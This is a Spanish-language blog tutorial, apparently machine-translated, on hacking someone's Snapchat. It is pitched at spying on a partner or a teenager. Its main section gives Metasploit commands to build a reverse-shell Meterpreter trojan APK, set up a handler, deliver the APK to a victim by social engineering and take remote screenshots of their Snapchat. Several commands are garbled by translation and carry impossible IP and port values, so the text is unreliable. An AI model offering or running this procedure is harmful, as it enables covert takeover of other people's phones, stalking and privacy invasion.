¿Cómo hackear realmente Snapchat?

¿Cómo hackear realmente Snapchat? 1

¿Cómo hackear Snapchat? He aquí una pregunta que algunos usuarios de Snapchat tienen. ¿Cómo me meto en el Snapchat de mi novio para saber si es fiel? ¿Cómo hackeo Snapchat para controlar lo que mi hijo adolescente está haciendo en su smartphone?

Lo primero que el usuario de Internet suele hacer es tratar de encontrar la respuesta haciendo una búsqueda en Google.

¿Adivina qué? Bueno, en toda la primera página del resultado, hay una gran lista de estafadores que prometen recuperar vídeos, fotos y registros de chat de cualquier cuenta de Snapchat.

Hay muchas estafas de todo tipo en la primera página de Google. Pero, lamento decirle que estos sitios le dan falsas esperanzas y que todos estos programas son creados para recuperar su contraseña de Snapchat , para robar su dinero o para tomar el control de su smartphone.

Entonces, ¿cómo se hackea una cuenta de Snapchat?

No existe un programa de hacking directo . Bajo ninguna circunstancia habrá un milagro que te haga hackear a una persona.

Sin embargo, no existe una seguridad de TI 100% garantizada. Así que para hackear una cuenta de Snapchat, hay que ser paciente e inteligente. Si desea herramientas especializadas, puede, por ejemplo, centrarse en la distribución de Kali Linux.

Piratear un teléfono móvil con Metasploit

Esta técnica consiste en explotar las vulnerabilidades del sistema Android, iOS o aplicaciones instaladas en él .

Cada día, los hackers descubren nuevas vulnerabilidades de seguridad en los sistemas Android e iOS. Estas vulnerabilidades son explotables y permiten a una persona tomar el control total de un smartphone o tableta.

Para explotar estas vulnerabilidades, un hacker crea una aplicación APK maliciosa y la envía a una víctima . Una vez que la aplicación está instalada en el smartphone de la víctima, es fácil tomar el control de su smartphone y recuperar sus fotos y vídeos de Snapchat.

Para ello, los hackers utilizan la herramienta Metasploit disponible en Kali linux.

Es una herramienta para desarrollar y ejecutar exploits contra una máquina remota. Contiene cientos de exploits y te permitirá atacar cualquier tipo de máquina.

Si quieres probar este método en tu teléfono y tienes un ordenador con Windows, te aconsejo que uses una máquina virtual que ejecute Kali Linux. Simplemente descarga VMware y una imagen de Kali Linux. Metasploit ya está preinstalado en él. He aquí cómo instalar Kali Linux en una máquina Windows con VMware.

Comandos utilizados para piratear un teléfono móvil remoto

Primero, abriremos el terminal Kali Linux y luego crearemos el troyano APK (esta es la aplicación que enviaremos al destino).

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.0.4 lport=444444> /root/Desktop/name-of-your-application.apk (reemplaza LHOST con tu propia dirección IP)

Luego abriremos otro terminal y lanzaremos Metasploit para configurar nuestro troyano APK.

msfconsole (para abrir la herramienta metasploit)

usar exploits/multi/handler (permite seleccionar el exploit del handler)
.
set paylaod android/meterpreter/reverse_tcp

set lhost your_ip_address

proeza

¿Cómo hackear realmente Snapchat? 2

Aquí está el módulo bien configurado, ahora queda por enviar el APK a una víctima utilizando la ingeniería social. Cuando la víctima instala la aplicación en su móvil, Metasploit le dirá algo así:

¿Cómo hackear realmente Snapchat? 3

Todo lo que tenemos que hacer ahora es abrir una sesión remota de Meterpreter en el móvil de la víctima:

msf> sesiones -i 1

Inicio de la interacción con 1….

Ahora tenemos el control total del smartphone. Por ejemplo: podemos tomar capturas de pantalla de forma remota desde la aplicación Snapchat:

Intérprete de contadores> use espia

Extensión de carga espia…success.
>.
intérprete de contadores> captura de pantalla snapchat.jpg

Para aprender más sobre Metasploit, le invito a leer este artículo: ¿qué es Metasploit y cómo usarlo correctamente?

Conclusión

Piratear una cuenta de Snapchat no es nada fácil. Esta técnica no es 100% confiable. Si el objetivo está bien protegido, no tendrás nada que hacer.

Espero que a través de este tutorial, hayas entendido cómo funciona la piratería de aplicaciones Android o iOS como Snapchat.

Si usted tiene adiciones para hacer de esta página una base de datos sobre Snapchat, no dude en enviarnos sus comentarios!

Contenido relacionado

1 comentario en «¿Cómo hackear realmente Snapchat?»

  1. Holaa, mi intención no es precisamente hackear una cuenta, lo que quiero hacer es recuperar mi cuenta de snapchat, olvidé la contraseña y para cambiar la contraseña tenía que hacerlo o vía gmail o vía telefónica. Lo intenté con el primero pero se ve que el gmail que había usado para crear la cuenta no era válido (aunque pude crear la cuenta gracias a ese gmail). Después lo intenté con el teléfono, me había hecho otra cuenta una hora antes y puse el mismo teléfono que en la cuenta original (no sé si esté relacionado), en cualquier caso me decía que el móvil no coincidía con la cuenta en la que estaba intentado acceder (es decir, la mía). Contacté repetidas veces con snapchat pero no me ayudaron.

    Lo único que quiero hacer es recuperar mi cuenta, ¿debo aprender a hackearla para poder recuperarla? O, ¿cómo lo harían ustedes?

    Responder

Deja un comentario